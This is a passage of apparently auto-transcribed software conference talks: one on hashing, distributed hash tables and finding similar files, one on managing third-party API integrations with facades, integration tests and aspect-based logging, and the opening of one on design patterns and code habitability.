It doesn't need any crypto keys to be exchanged. It doesn't need to be protected from man in the middle attacks. It doesn't need to do anything like that. So then the question is, how do we find this thing? Because we haven't said which host it's on. Well, that's a well-solved problem. So DNS usually works. You've got two start addresses in your, okay. So you have two start addresses in your machine. And the answer is what you've got when you turn your machine off. So when you boot your machine, you've got two start addresses in a cache. A DNS1 and DNS2. And you go and look at these two addresses. In a peer-to-peer system, you've got a long list of machines that are known to participate in a distributed hash table. And what do you do? Let's suppose I know about these machines here. Here's the IP addresses of machines that are participating in a peer-to-peer distributed hash table. And what you do is you compute the SHA1 checksum of each of these IP addresses, and you sort them all. And you say, okay, I've got this resource. I want to find something with this hash. Where is 536852? You look in this and say, well, it's somewhere these two machines here that I've highlighted. They're the nearest machines in this space to this hash address. So I go and ask them. And they've got lists like that. And they'll find the nearest ones. And they'll go and ask them and so on. Okay, so this is the basis of CORD and Catermelia and algorithms like that. These are well-understood algorithms. The Catermelia system's got something like 9 million machines. It's actually invented by the file sharers who are using it to share movies and things like that. But it works great. So we could put all information into this. Right. Instead of just having movies and things like that, just put all information into it. Right. So here's how to make... So I'm going to make the condenser. The first thing we want to do is find all identical files and then find all similar files and reduce the amount of information on the Internet. Well, finding all identical files on the Internet is trivial. We compute the SHA1, check some of it, and we inject it into the hash table. That's all we have to do. You can do that in all the machines in the world. Can run in parallel. We could do this in a few hours and get rid of all the replicas. Okay? That's what Dropbox does, I think. If you put stuff in there, it's got the same checks and without. I don't need to keep multiple copies. I just keep two or three copies. Right. So that's the finding all identical files bit. Now we want to find all similar files. Right. Find the most similar file to a given file. This is a tricky problem. I've been thinking about this for ages. Okay. So the best algorithm I know, I'll just tell you the answer. It's called least compression difference. If two things are similar, then if you concatenate them and compress them, the size of the thing will be, okay, so you've got the file here. You compress it. It's got a certain size. If you took the file twice and compressed it, concatenate it and compressed it, the file size of the compressed file would be only a little bit greater than the file size because it's just describing the difference. There is no difference. So if you take a file, concatenate it to itself 100 times and compress it, it's about the same size as the file compressed by itself. It's very dissimilar. Two files that are totally dissimilar. Random numbers that are totally dissimilar. If you compress A and you compress B and you compress A concatenate it to B, the size of the totally dissimilar one will be more or less the size of the sum of both of these. So this will find the most similar thing. It's very insensitive to changes in the compression algorithm. So I have a thing on my machine. I type, when I've got information, I type it into a little box like Twitter. I press the Sherlock button. Sherlock Holmes, this little icon there. I press Sherlock. It does least compression difference on most of my files. It takes a long time. Then it says, hmm, do you know? The most similar thing to that was something you did 15 years ago and it's in this file. It finds it for me. I want that to be on the entire internet. I want us to put all the information we've got into the internet so that we reduce the amount of information. We reverse entropy and you just make it more manageable. Okay. Right. This takes order of time n, where n is the number of files on the planet. So it's not super quick. So I'm just wondering if we can speed it up. We have to reduce the search space. I don't really know how to do that. I'd like to talk to some researchers who know how to do that. But there's a little hint there on, we certainly know things that couldn't be similar because they're very different sizes. The plagiarism detection algorithms, do you know how they work? They work on a rolling check sum. There are databases of open source software and of student essays that people do for the feces. What you do is you take the source code or you take the student fee. You chop it into 50-byte blocks, say 50 bytes, and you compute a check sum, an MD5 or an SHA1. You stick that in a key value database. Sorry, no, it's not an MD5. It's called a rolling check sum. I didn't mention what they're called. A rolling check sum is one that you take 50 bytes, you compute the check sum, and if you shift it by one byte, you can incrementally change the hash. It's a typical one. You XOR all these bits. Simple one is XOR all the 50 bytes. When you shift it by one byte, you XOR the final byte and XOR the beginning byte, and now you've got the check sum of the next block. That's called a rolling hash. What you do is you take your data, split it into 50-byte blocks, compute the hash, the rolling hash, stick them in a catamilia or a distributed hash table, and then you take your 50-byte block, look it up in the hash table. If it's in there, that line would possibly be the same. Let me go and look at it and see if it actually was the same. You can do that in linear time per docket. It needs order of n lookups where n is the number of bytes in the file. It's reasonable. You could probably do that fairly quickly, I think. Right. Summary. We made a mess. Horrible mess. Created millions and trillions of man hours of work. In order to get out of this mess, we need to reverse entropy and start making things simpler instead of making things more complicated. Quantum mechanics sets the limits to the precision or the number of bits we need in checksums and things like that. We can dimension our systems accordingly. We would love some mathematics to prove things. I think we're going to have to wait a long time. Yeah. Well, join the war on names and help me build the condenser. That's the next five years job. Thank you very much. So, any questions? Yeah, where do I buy a quantum computer? You can't. And wouldn't a black hole computer be dangerous? Possibly. No questions, though. Different problem. Google it. Get to work.
Software is a mess. In the last 40 years I and my colleagues have been writing buggy, unspecified, and difficult to maintain software. By doing so we have created an entire industry. We have collectively created billions of lines of unmaintainable unspecified code that will require millions of programmers to work for thousands of years to correct the mess we've made. Where did things go wrong? Can we make things work again? Should we admit we were wrong and throw all our legacy software away and start again? How can we make correct software, that is easy to understand and maintain? I don't pretend I can answer these questions - but I have some idea as to what went wrong, so maybe we can learn from our mistakes. In this lecture I'll talk about some of the biggest mistakes we made and what we can learn from these.
10.5446/50611 (DOI)
Hi everyone. My name is Caroline Cleaver. I work as a developer at Epinova. I'm here today to talk to you about the integrations with fear and how we can manage them. Have you ever thought about which integrations you fear? Because I have. I've given it quite a lot of thought. And it's not just because of this presentation. But it started about two years ago. I was working on a project with quite a lot of heavy integrations. And I kept recognizing this really bad feeling. I didn't want to work with it. And I couldn't figure out why. So what I did was that I tried to identify this feeling. And I tried to categorize them because there were several of them. And I tried to categorize them to figure out what was it. And I came up with four fears. Four fears that I have when it comes to integration projects. And I'd like to take you through these before I move on to looking at how we can manage them. Just so that you all have the basis for this talk and you know where I'm coming from. So what do I fear? Well, the first thing I fear. I fear badly written APIs. You know those APIs that look like they're written by a person who's never ever seen an API before. I fear those. And I have an example here from that project that I worked on two years ago. And I was given quite a large set of web services. And I was even told for quite a lot of those web services which methods I had to use. So you would think that this would be an easy job, right? It would be a walk in the park. You had everything you need. You had the web services. And you even know which methods. But then I sat down and I had a look at this API. And this is what I saw. The method that I was supposed to call was called get changes. And there are five different get changes methods. And they're all prefixed with bullshit. You have the new get changes. You have the old get changes. The old new. And the test get changes. And I mean, what do you do? You can't tell them to rewrite their APIs. Or you could try. But probably they're going to say no because they don't have the time to do this. And you have to use it. But you have to make sure that when you're using APIs like this, that the lack of quality from that API does not infect your code. So that's my first fear. My second fear is that I fear heavy payloads. If you're giving me data, I want to receive only the data that I need. I want your complete database. I just want the data that I need. And I want to tell you which data I need. Because heavy payloads, they often come with performance issues. And I hate performance issues. I hate debugging them. I hate everything that comes with performance issues. So that's why I fear heavy payloads. And I have an example here as well from a recent project of mine where I'm receiving quite a lot of data as XML. And the example you see here is only a small part of it. These XML files are quite large. And what you see here is that you have an entity element. An entity element contains quite a lot of different attributes. And every single attribute contains a product ID, organization ID, version, and language. Now, the parts marked in yellow, they are identical for every single attribute. There's no need to put this on the attribute. Why isn't this on the entity element instead of on every single attribute? If you have lots and lots of data like this, the heavy payload might contribute to performance issues. So that's my second fear. My third fear is that I fear unnecessary complexity. And I'm not just talking about code here. I'm talking about every single step of the project, whether it's complex communication, whether it's complex architecture, whether it's the code that's complex. Unnecessary complexity is not anything you need in an integration project because integrations in themselves are complex. So you need to remove any unnecessary complexity. And then my fourth fear is that I fear third-party vendors who are not willing to cooperate. And you would think that if someone created an API, they would want other people to use it, right? I mean, why do they have an API if they don't want people to use it? But in a lot of cases, as soon as you start questioning about them, about their APIs, they don't want to talk to you. And I was in a meeting about six months ago with a customer. I work as a consultant. So I was in a meeting with a customer and a third-party vendor. And we were discussing how to solve a problem. Before the meeting, I had read the documentation for the third-party vendor API, so I knew that I could use or I could solve this problem if I could use their APIs. Halfway into the meeting, we'd been sitting there for about 30 minutes. They still hadn't mentioned this API, so I just had to ask them. And I asked them, well, can't I just use your API? If you let me use your API, then I can fix this. Problem solved. And the woman that was sitting across from me at the table, she looked at me and she said, you know what? We'd rather you didn't use our APIs as they require about 200 hours of training. I was shocked. I mean, if your API requires about 200 hours of training, it's either a really badly written API or your domain is so complex. And I wanted to tell her that I could probably rewrite her API in about 200 hours, but you can't say that in the middle of a customer meeting. What you do is you tweet it instead. And then you have a presentation about it. So these are my four fears. I fear badly written APIs. I fear heavy payloads. I fear unnecessary complexity. And I fear third party vendors who are not willing to cooperate. Now, how do we manage these? That's what I'm going to talk about for the next 15 minutes or so. But before I go into how we can manage them, I'd like to ask you why? Why do we need to manage these integrations? Well, integrations, they come with complexity. I already told you that. But as soon as you decide to integrate your application or your system with a different system, you're increasing the complexity. And increasing complexity means that you're increasing the risk. You're increasing the risk of something going wrong. You're increasing the risk of not finishing on time because there were just too many unknowns that you were not able to foresee. Or you're increasing the risk of new bugs because adding an integration means adding more code. And as we all know, when we write more code, we also write more bugs. So you're adding risk. And that's why we need to manage them. So I like to divide integration projects into two different phases. And these are those, too. It's a setup phase. And then there's an implementation phase. The setup phase is every single thing you need to do before you can start writing code. The implementation phase starts the second you start writing that code. And what I like to do is I like to take you through both these stages. Step by step, what do you need to do? How can you make sure that your integration projects are going to be as easy as possible and as maintainable in the future as they could be? So let's start with the setup phase. I already told you that the setup phase involves every single thing you need to do before you can start writing code. So imagine that your project manager or your project architect comes to you and says, I want you to integrate our application with this system over there. That's all the information you have. What do you do? Well, the first thing you need to do is that you need to figure out who to talk to. There's someone at the third party vendor who created this API that you're going to use. And you need to figure out who is this person? Who can I talk to when I have trouble? And I'm going to say when, because that's the case in a lot of integration projects. There is no if. There's a when. You're going to run into trouble at some point. So you need to figure out who can answer my questions. And there are several ways of communicating, and you can communicate the hard way like this, where you have a question. So you go to your project manager. Your project manager goes and talks to the account manager at the third party vendor. The account manager goes and talks to project manager who in the end goes talking to some tech guy, and he's the one who can answer your questions. Now, if one of these people are on vacation, you're screwed. And these three people in the middle, they're not technical. They might turn your question into some buzzword in mumbo jumbo. So what you want to do is that you want to reduce the complexity of communication. You want to cut out all the unnecessary parts. You want to talk directly to the person who could help you. There's no point in talking to all the people in the middle. And if your project manager feels the need to know everything that you do and to make sure that every single question you have goes through him or her, then you have a trust issue, and you need to focus on that before you start communicating with other people. So as long as you're able to update your project manager frequently on what you're doing and how the communication with the third party vendors are working, that this should be a good way to do it. Now, of course, you need to make the third party vendor agree on letting you communicate like this. And from my experience, the worse the API, the more people you have to go through to get the answers. But this is the goal. This is the ultimate goal. You want to talk directly to the people who could help you. Now, as soon as you know who to talk to, you should figure out how you'd like to communicate because there's nothing more annoying than being in the middle of some problem, in the middle of some code, and your phone keeps ringing all the time. So figure out how you communicate. Do you call each other? Do you write emails? Do you have meetings, video conferences? Just get that covered so that everyone knows how to communicate. And then there's one last thing you should do that's really simple, but it's the most effective thing you could do at this stage. And that is to ask one question. Ask them, is there anything you need from me? Even though you know that there's nothing they need from you, ask them that question because showing them that you're willing to help is probably going to make them more willing to help you in the future. That's when you really need it. So now you know who to talk to, you know how to communicate. Now you should ask for the documentation. If you don't ask for documentation, if no one asks for documentation, there's no reason for them to keep the documentation updated. And as we all know, outdated documentation is worthless. There's no point in reading outdated documentation. So you should ask for it. And then you're going to read it. I'm sorry, but you have to read it. There are a lot of things you cannot figure out on your own. A lot of developers, they receive an API and they think, oh, great, I'm going to figure this out. And they start looking at the code. And in a lot of projects, that's going to work out fine. It's going to work. But not always. And if you do that with one of the APIs where it won't work, then you're screwed. If you've ever worked with the Microsoft Dynamics CRM Web Services and read that documentation, that documentation contains a lot of information about the different ways you can do things. They tell you you could do it this way. And your code is going to be very customizable, but it's not going to be very efficient. And then they're going to tell you, or you could do it this way. It's going to be really efficient, but you can't customize it. And when we're talking about efficiency and performance, this is not something you can figure out by just looking at an API. This is what you need documentation for. So make sure you read the documentation. And then we should agree on jurisdiction and specification. If you watched any cop movie during the 90s, you're going to see some poor murder guy lying there. And the police department from one district shows up coming to investigate this murder. And then the police department from the neighboring districts, they show up an hour later. And they're always fighting about who's jurisdiction it is. It's my jurisdiction, it's mine. In development, it's the opposite. We don't want jurisdiction. What we're doing is we're telling them this is not our bug. It's the guy over there. He created this bug. So you have to go talk to him. And the guy over there, he's pointing his finger at you. And while you guys are playing the blame game, pointing fingers at each other, there's no one fixing the bug. Now, this is why you have to agree on the jurisdiction in the beginning before you start writing code. Because every single party, every person who's involved in the project, they need to know their responsibilities. Who's responsible when this stops working? Who's responsible for this part of the system? Who's responsible for communicating with each other when something goes wrong? You should figure this out. And then you should make sure that everyone has read the specifications. Make sure that everyone's on the same page. Because if you have a lot to do during your project, and the customer or the product owner comes to you, and they say, could we just add this tiny little feature? And their tiny little feature, what they don't understand is that this is actually a massive job for the developer. And you tell them, I'm sorry, but it's not part of the specification. There's no way we can make that happen before the deadline. And then they go talking to the third party vendor. And the third party vendor, they don't really have a lot to do. They have some spare time, I mean, no one's using their APIs. So they say, yeah, sure, we can fit this in, because they haven't read the specification. So now you're the bad guy who didn't want to add the feature. But now you're forced, because one of the other parties of the project said yes. So make sure that everyone reads the specification. Make sure everyone knows what you're doing, what's part of this project, and what's not. Now, it's time to get a bit more technical. We're almost getting to the code, but we have a couple of things left that we have to do. Now, you have to get access to everything you need. When you're working with integrations, you're probably going to need access to something, whether it's access to an application, to a server, whether it's needing a license or a username and password of some sort. You should get access to all of those things before you start writing code. Because there's nothing worse than starting to write code, and then you have to stop for a couple of days, just because you didn't have everything you need. So make sure you have that covered before you start writing code. And when someone sends you an email saying, here's the server you're going to have to log into, and here's your username, we'll send you an SMS for the password, make sure that you actually test that you have the access they say you have, because that's not always the case. So don't just archive the email, check that you actually have the access that you need. And then, last but not least, this is a given for most developers. Give me a test environment. There's no way I'm going to code against the production environment, because I want to be able to create data, I want to delete it, I want to update it without pissing anyone off. So give me a test environment, and make sure that that test environment is identical to the production environment. And you'd think that that would be a given as well. But in the project a couple of years ago that started this whole bad feeling and all my fears, that was not the case. The test environment worked, but as soon as we moved it out into production, it turns out the test environment and the production environment were not the same. It cost us a lot of headache. So demand a test environment and make sure that it's identical to production. Now, this is all you need in order to start writing code. You have everything you need now. You've agreed on what you're supposed to do, on how you communicate, you have access to everything you need. Now, there's one last thing I'd like to mention before we start getting a bit more technical, and that is that the setup phase, the most important part of the setup phase is that you have to start setting up as soon as possible. And I think this is where a lot of integration projects go wrong, because developers, we love writing code. That's what we want to do. So we don't start setting up soon enough. Imagine that this is your future. You're working on a current task. When you finish this task, you're going to do some kind of integration. And then after that integration, you have one single something else task, and then you reach your deadline. That's it. Now, what a lot of developers do is this. They finish the task they're working on right now, and then they forgot that there was a setup phase. They forgot how time-consuming it was to figure out all the responsibilities, the specifications, the communications, so that by the time they can actually start coding, they're already delayed. And by the time they finish their implementation phase, they have to choose, do I cut out that last something else task, or do I go past my deadline? So what you have to do is that you have to start setting up in parallel. As soon as you know that you're going to do an integration of some sorts, you should start setting up. So what you're doing is that you're setting up in parallel to the task that you're working on right now, so that when you're finished with the task you're working on right now, you can actually start coding immediately afterwards. And you're still going to have time for that something else task, and you're going to reach your deadline. So if there's anything you're going to remember from this presentation, it's this, start setting up as soon as possible, because you don't want to spend more time than necessary doing that. Now, just to show you how time-consuming communication can be, I have an example here from a recent project of mine. Now, in this project, we were receiving what they called gadgets. A third-party vendor were supplying us with gadgets. What it was was just simple JavaScripts, and they inject HTML onto a web page. But they weren't only injecting HTML, they were also injecting quite a lot of CSS, which was making the website look horrible. So what I wanted was I wanted them to remove the CSS, and I sent them an email, because that was how we communicated, and I told them, could you please remove the CSS? And I expected them to email me back sometime within the same day, telling me, okay, it's gone. But no, no, that didn't happen. What happened was that I had to send 22 emails, and it took them 15 days to remove a CSS file. And this is how time-consuming communication can be when communication is not working. And trust me, picking up the phone didn't work either. So sometimes communication can be so time-consuming that there's no way you could have included it in your estimates. And that's one of the reasons you have to start setting up as soon as possible. Now, let's move over to the fun part. Let's do the implementation phase. This is where we start writing code. Now, is the way you write code in an integration project, is it any different from how you write code in any other project? No, it's not. Or it's not very different, at least. As long as you follow the solid principles, you write loosely coupled code, it's testable, and you care about your code, then you're going to be fine. Your code is going to work, just as it would in any other project. But the four fears that I mentioned in the beginning, my fear of badly written APIs, my fear of heavy payloads, my fear of unnecessary complexity, and my fear of third-party vendors who are not willing to cooperate, those all contribute to one thing. They make integration projects extremely hard to maintain. If you've been there from the beginning, I mean, if you're the developer on this project, you have all the background information, you have the domain knowledge, you've been there from the start, so you might not find the project hard to maintain. But the poor guy who's going to take over this project in two or three years, he doesn't have that same knowledge that you have, and you have to make sure that this project is going to be easy for him to take over. It's going to be easy for him to maintain as well. So there are three things that I like to focus extra on when I'm working on integration projects, and that is making the project more maintainable, or easier to maintain. Those three things is the facade pattern, it's integration testing, and it's logging. So I'm going to take you through all these three. I only have time to touch on the basics. These are definitely things you should look into a lot more when you're working with integrations. So let's start with the facade pattern. The facade pattern is actually a pattern that most developers use every day, but they might not know that it actually has a name. So when I show you this code later on, you're going to recognize this, you're probably doing it yourself without knowing it has a name. What this facade pattern does is that it hides the complexity of the API you're using so that it doesn't infect your code with a lack of quality from within that API. And as you're wrapping this API, it also makes it a lot easier to replace that API at some moment in the future if the customer or the product owner decides that they want to replace that API with another one. You could do that without ripping apart your entire project. Now, the facade pattern, it could be used in quite a lot of different ways. I'm going to show you a couple of examples here. You could have, for example, here you have a product API, and I have one product facade that uses the product API. Now, any other code in my application that needs something from the product API would use the product facade. We could do the same thing, but with several APIs. If you have more than one API and the data that you receive from those are logical to combine, then you could have one facade using several APIs. For example, here you have the product inventory API that uses both the product API and an inventory API. I mean, the product inventory facade, sorry. Me, myself, I prefer to separate this even more. I prefer to have one facade for each API, but it's a sense of style. You could also have several facades working against one API. For example, here I have one product API, and imagine that this product API, it contains information about products and their inventories. So now you could create one product facade and one inventory facade, and whenever you need something that has to do with the products, you go towards the product facade. Whenever you need information about the inventory, you use the inventory facade. This is a really logical way of stretching your code. This is separation of concerns, right? If you take a look at some code instead, here's some example code without using a facade. This is a simple web API controller, or the get action of a web API controller, and given a product ID, it returns the inventory. As you can see here, the parts marked in yellow, they are API calls. There's one calling a get method of a dynamic product just to get the product, and then you're getting the number of products in stock by getting the prod stock attributes. Now, this works, but you're mixing responsibilities here. The web API controller with a get action, the responsibility of the action should be to return the correct response. It shouldn't be concerned with how the API is working. So what we do here is that we introduce a facade. We move all that thing, all the code that has anything to do with the API, we move that into an inventory facade. Now you can see the get action is only concerned with what type of response should it return. It doesn't care about the API anymore. And how does the facade look? Well, it's the same thing, but we just moved all the API calls out into a separate class. And you could also see here that it has a helper facade, the product facade. And this is, as I said, a very logical way of structuring your code. This is how a lot of developers do it, because this enables you to test that get action in the web API controller. You wouldn't have been able to test that if you hadn't used the facade. So that's all I'm going to say about facades for now. Let's dig into the more complex stuff. Let's look at the integration testing, because when you're working on integration projects, you have to be able to integration test them. This is going to make it a lot easier to maintain the future, not only for the guy that's there in two or three years' time, but for you as well. So what do you test when you integration test? Well, in integration testing, you could be testing how parts of your system are working together, or how your system, or how your application is interacting with other systems. So whereas in unit testing, you're only testing code in isolation, in integration testing, you're actually allowed to call APIs. You're allowed to query databases, things you cannot do in unit testing. So these are the things you'd like to test. You'd like to test internal classes and subsystems. And when I say internal classes, I'm not talking about classes that are marked with internal. What I'm talking about is classes that you have control of, classes that you're responsible of. You could be testing two or three classes and how they are working together, or you could be testing 14, 15 classes, how they are interacting. Now, one thing to remember is that you're not interested in testing all the ifs and the buts. You're interested in testing the end result, or the state of your application when you're integration testing. So if you're interested in all the ifs and the buts, that's the responsibility of unit tests. You don't do that in integration testing. You could be testing external components, as I said, APIs, querying databases, those kinds of things. This is going to make your tests a lot slower than unit tests. And this means that you won't run them as often. You have to remember to run them often enough to make sure that they're actually useful. And as you might be calling external components or APIs, they're also going to require a lot more setup than a unit test would, because you're not mocking things anymore. You're using the actual implementations. So you might have a lot more setup for your tests than you would in unit testing. And then you could be testing your application service layer. If you have any web services, for example, the web API controller that I was showing you earlier, you could be integration testing that to make sure that they're working as they should. Now, let's look at some code again. This is our system under test. This is the same web API controller that we were looking at earlier. And if I was unit testing this, I would mock the inventory facade, and then I'd have one unit test where the inventory was null, or where the inventory facade returned null, just to test the first if statement, and that the response was correct. And then I would have one unit test where the inventory existed so that I could test the last return statement. But when you're integration testing this, you're not interested in mocking the inventory facade. What you're interested in is seeing how does this get action, how does this web API controller interact with the inventory facade? So how do these two classes work together? And what's the state of your code after running this? So let's look at the integration test. As you can see here, it has quite a lot of setup, but it's still not very much. This is actually not very much for an integration test. What you have here, you have the inventory controller, which needs an inventory facade, and the inventory facade is using a product facade. And they're using all the actual implementations of those classes. You're not mocking any of them. The only thing I'm mocking here are some application settings, because I'm not interested in how those application settings are retrieved. What I'm interested in is how the web application, or how the web API controller is working with the inventory facade. Now, the integration test itself is really simple. It sends in a product ID, and it checks that the response it gets is a 200k. And this means that the product ID that is sent in has to exist. Now, what happens if a colleague of mine goes in and he deletes this product? Well, my integration test is going to break, and that's not good. So you have to make sure that your integration tests are a bit more subtle than this one. So what you could do is that you could, in your integration test, create the product and then test that you're able to retrieve it as you should, and then delete it again. In that way, your coworker won't be able to make the test break by doing something in the database. So when working with integration projects, you have to look into the details of integration testing and see how this works. What is going to help your project move on? Now, the last thing I'd like to look at in the implementation phase when it comes to the coding part is logging. We all log when we write code, but the question is, do we log enough? Do we log what is actually interesting? Imagine if we have to get changes method from one of my first slides. We figured out which one to use. And this is how a lot of developers log. We have a get changes method. It returns the result of the API call, and if there's an exception, they log the exception and they return null. And this is fine. But what happens if your colleague comes to you and says, you know what, I think we might be having some performance issues. I think to get changes method, I think it takes way too long to execute. Or if they come to you and they say, we're actually updating quite a lot of products, but we can't see them in your application. Are you sure you're retrieving all the changes that you were supposed to? You won't have an answer, will you? Because the only thing you're logging is an exception. And in those two cases, there won't be an exception. So what do you do? Well, you can add lots and lots of logging. Here there's a stopwatch. So you're timing how long the whole method takes to execute. You're also logging the number of products received from the API call. So you know how many. It might be more useful to log the ID of every single product than you have all the details. But I mean, this is not what you want, right? You can't see the code anymore, because everything you see is logging. This is not readable code. So I want to log a lot, or I want to log a lot more than what we saw in my previous slide. But I don't want to see it in any way. How do we do that? Well, luckily there are tools you can use. I've been using one called PostSharp, which is quite useful. And here's that same piece of code, except now there's no logging. Or there's no logging that you can see by looking at the code. The only thing you see here is that I've added a logger attribute, and that takes care of all the logging for you. Now, what does that logger attribute do? Well, what it does, you can see it here. PostSharp, you could install that by Nougat. And you get a couple of assemblies containing lots and lots of classes that you can inherit from. One of these is the on method boundary aspect. So the logger attribute is inheriting from the on method boundary aspect, and that lets you override a couple of methods. Here you see the on entry, the on success, and on exception. There are also a couple of other ones, but these are the ones I'm going to focus on now. Now, these methods are called like this. As soon as your get changes method is entered, the on entry method is executed. When the method has run successfully, the on success method is executed. And if there's an exception, the on exception method is executed. So this means that you could add logging in this logging attribute, and it won't be visible in the code that you're writing. Now, how does this work? Well, if you add this logger attribute that I created, if you add that to your Summier code, and then you decompile it, you can see the details of what PostSharp is doing. And what you can see here is that they're actually adding quite a lot of code. And you can see the parts marked in yellow. Here you have the on entry, the on success, and the on exception calls. So what they're doing is that they're actually injecting code into yours. This is called aspect-oriented programming. It's really interesting if you'd like to look at the details of it. Let's look at the attribute itself. Now I added some logging. The compile time initialized, that's something that's run on compile time. And what that does, it just stores the name of the method that you're currently interested in. You have the on entry method, and now I'm logging, entering, and then the method name. On the on success, I'm logging, exiting method name with return value and then the return value. So within these classes, you have access to the return values, the parameters that are sent into your methods, and you have access to any exception, the exception messages, if there is an exception. So in the on exception method here, you see that you're logging, exiting method name with exception, and then you're logging the name of that exception. So by using tools like these, you're unable to log a lot more than you would in any other project, but it doesn't clutter your code in any way. And you could also be adding these post-sharp attributes to your code afterwards if you forgot to add logging, if you need to debug your code in some sort. So I've taken you through two phases of integration projects, the setup phase and the implementation phase. The setup phase contains every single thing you need to do before you start writing code, and the implementation phase starts the second you sit down and start writing that code. The code you write in integration projects, it's not that different from code you would write in any other project, but what's important is that you have to focus on maintainability, making it easier for other people to take over that code. So you could use the facade pattern to make your code more loosely coupled to wrap the APIs. You could use integration testing to make sure that all the systems are communicating as they should. And you could use logging so that you'll be able to figure out what's going on in your application at any moment in time. If you have any questions or you'd like to contact me, here's my Twitter handle and my email address. It's been a pleasure talking to you. Thank you..
Have you ever received an API or a set of webservices that just weren't good enough? This happens more often than we'd like, and when it happens it's important to know what you can do to make sure your project isn't infected with the lack of quality from third party vendors. I'll talk you through the different stages in your project, highlighting the steps you can take to minimize the risks of integrating your system with another, while making sure it will be maintainable in the future.
10.5446/50612 (DOI)
Right, good afternoon. That's a lot of you. Okay, good. What are we going to talk about? We're going to talk about patents. And patents are a fairly familiar topic for a lot of people. Or rather, I think for a lot of people their knowledge of patents is kind of a lot like my knowledge of Norwegian. I can order a beer. I can order another beer. Once you've got that, you've got the iteration set up. Okay, that's fine. I don't know how to stop ordering beer, but that's okay. You just kind of throw an exception or something. And I can count to ten and I can recognize a few street signs and that's my Norwegian. That's a lot of people's knowledge of patents. Normally it goes about as far as, oh, Singleton. So I want to take a slightly different perspective. I want to look at this from the original idea of problem solving. I will use a couple of patents examples as we go, but really what was the original intention? Communication, problem solving, and so on. I've been involved in the Poser series, patent oriented software architecture series of books. I was a principal reviewer on Poser's two and four and co-author of four and five. And the moment looks like we're going to do a second edition of Poser two and I've been enlisted as an author of that. So we should see if anything happens there. But actually I don't want to start off by referring to these books. I want to start off by referring to another book with the word patents in the title. I often draw from these days. It's one of these books that's out of print but is available on the web, Dick Gabriel's website. It's available on PDF. Although it's called Patents of Software, it's not strictly just about patents. It's actually a lot of it. It's very autobiographical. It's about his involvement in software, his career. But also there are some other discussions of what we want from software and other thoughts about software and programming languages. It's mid-90s, so a few things have changed since then. But surprisingly, there's much in this book that is still overlooked. I think one of my favorite passages here is one he talks about habitability. What do we mean by habitability? He talks about habitability. Characteristic source code enables programmers and people coming to the code later in its life to understand its construction and intentions and to change it comfortably and confidently. This is a property, it's not identical to the property of maintainability. Sometimes people look at this and say, oh, you mean maintainability? No, because I still don't know what maintainability means. I've only been doing software since, oh, sometime in the last century. I don't know what maintenance is because when I look at people saying they're doing maintenance, it looks like they're doing product development to me. They're doing continued development. Strictly speaking, we don't really maintain stuff. The ones and zeros don't fall off a piece of code. It's not wear and tear. What most people talk about as maintenance is either fixing problems that were always there, bugs don't suddenly appear. There's not some kind of spontaneous decay mechanism that takes correct code and replaces it with incorrect code. Although sometimes some of your colleagues may feel like spontaneous bug introducing mechanisms, that's not how you think of human beings and shouldn't do. So either they're bug fixing, which is bug fixing that's not maintenance, or they are adding new features, which is called adding new features, not maintenance. So this idea of going back into the code, to reread the code for whatever reason, to understand what it is doing, to understand what it is that you want to get from it, why is it doing something and what do you want to add to it? This is a really important thing. It's this question of intention. Now, those of you who went to my earlier session, I made a couple of points about that, that our big discovery, our big challenge rather, is the discovery of meaning. When you go into a piece of code, it is the meaning that you need to work with. The problem is that we often don't get the meaning, we get the mechanics. You don't get the person's intention. And this is a problem because many of the problems of legacy code, sometimes we like to think of legacy code as a problem that's to do, well, in fact, everybody walks around with a simple definition of legacy code in their head. Legacy code is code somebody else wrote. That's everybody's working model. Okay? A few people have other economically related ones, but as far as most people are concerned, it's code somebody else wrote. And if it was me, well, I was somebody else when I wrote it because clearly no idiot, only an idiot would write this. So it is to do with intention. But it's not just to do with the basic quality. Sometimes people assume legacy code means automatically means bad quality. It doesn't. Sometimes the issue is that a problem was solved. Somebody solved a problem. The code looks odd because it solves a particular problem. And then the cause of that problem went away. We upgraded the hardware, the customer changed their mind about something, the software changed, something changed. And it turns out we're still working against a legacy assumption. So the whole code is bent out of shape. You get this, particularly if you look at a lot of old C code, for example, which I try to avoid, but a lot of old C code has lots of really weird things like arbitrary sizing of things because of memory. And the memory thing's kind of gone away except when it hasn't. And when it hasn't, it looks different anyway. And the problem is people still find themselves contorting around the structures that were placed by a constraint that is no longer there. So somebody did solve a problem. The code is not bad quality. It was the right quality at the right time. But what's happened is we no longer understand why it is like this. So nobody's confident about removing it. Maybe it'll get rid of a broken constraint. Why is this here? So it turns out that we have many reasons to want habitability. Habitability also is another concept. It is this idea of making a place like home. Habitability makes a place livable like home or like work. You know, this idea, this is what we wanted software that developers feel at home, can place their hands on any item without having to think deeply about where it is. A kind of intuition that comes with a familiarity. But also the code is where you live. If you work in code, that's where you spend most of your time. You want it to be pleasant and habitable. You want it to be a nice environment, a habitable environment. One that you feel confident not simply in locating, but I'm going to go further than here, actually changing, confident to change. This is the resistance that we feel. So where do patterns fit into this? Well, patterns historically have nothing to do with software. So this is one of the kind of first things whenever anybody says, oh, patterns, that's to do with object-oriented software. No, it's not even to do with any kind of software. It comes from the built environment, which is why the habitability idea is important. So what do we mean by pattern? Well, let's have a look at a couple of things. A regular form or sequence discernible in the way which something happens or is done. An example for others to follow. Okay, this is good. There's repetition. That's what makes a pattern. So sometimes people will come up with a technique and it'll be a new technique and they'll publish it on a website or in a corporate guideline of best practices and patterns. This is fairly standard for a lot of software firms. Here are the patterns. How many times have you used this pattern? Oh, we invented it. We've only used it once. It's not a pattern. Okay, pattern. The clue is in the word. It repeats. You know, that was a pattern is a thing that we have seen and we have knowledge of. We have seen it out there in the world and we've got some kind of idea, yeah, this works, or it works in that situation but not in that situation or this doesn't work at all. But people still keep doing it. All of these are patterns. Okay, there must be recurrence. That's not to say that the technique is good or bad when you present a new technique. It can be good or bad, but it's not a pattern until people start doing it. So there's this dysfunctional habit sometimes people have of another related term is idiom. People say, I've invented a new idiom. It's not an idiom until people start using. So there's this idea. There's recurrence. Okay, then we have another idea. The other idea which is clearly a software motivated thing. A particular recurring design problem that arises in specific design context and presents a well proven solution for the problem. Solution is specified by describing the roles of its contention parts and so on and so on. Right, what we've added there, as well as a lot of jargon, is the idea of context. We see a problem. We see it again. It arises in a particular context. A pattern is a recurring solution to one of these problems and this is really important. It's a very subtle point but it's one of the distinctions between what people tend to consider to be principles versus say patterns. A pattern is context dependent. That means it solves a particular problem in this particular space and if you want to apply that pattern elsewhere, it may not work and that's not a bad thing. Whereas 